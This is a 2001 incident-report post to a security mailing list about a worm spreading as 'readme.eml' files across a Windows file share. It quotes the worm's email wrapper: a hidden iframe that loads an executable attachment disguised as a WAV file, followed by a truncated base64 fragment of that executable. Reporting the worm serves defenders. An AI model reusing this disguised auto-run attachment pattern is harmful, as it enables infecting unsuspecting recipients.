Security Incidents mailing list archives

RE: New worm? 'readme.eml'

From: Mark Ng <hostmaster () qpp co uk>
Date: Tue, 18 Sep 2001 16:51:00 +0100

I've just seen this infest an NT share.  I've isolated it to one drive (this
machine is a fileserver with no access of it's own to the internet.)
Further following behaviour, this worm copies itself into available
directories, (I think using a client machine, as this is restricted to one
drive only one department has access to) naming itself the same as other
files in that directory, except as a .eml .  Upon opening in a text editor,
the same content as described below by Pedro appears.



When I connected to the originating server (femm.tdkomm.com.br), I 
saw the normal web page for the institution, plus a pop-up window for 
http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as 
follows:


MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW
4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJ
mqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UE
UAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEA
AAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

New worm? 'readme.eml' Pedro Miller Rabinovitch (Sep 18)
- Re: New worm? 'readme.eml' Christopher X. Candreva (Sep 18)
  - Re: New worm? 'readme.eml' Tony Abedini (Sep 18)
- <Possible follow-ups>
- Re: New worm? 'readme.eml' coop (Sep 18)
- RE: New worm? 'readme.eml' Mark Ng (Sep 18)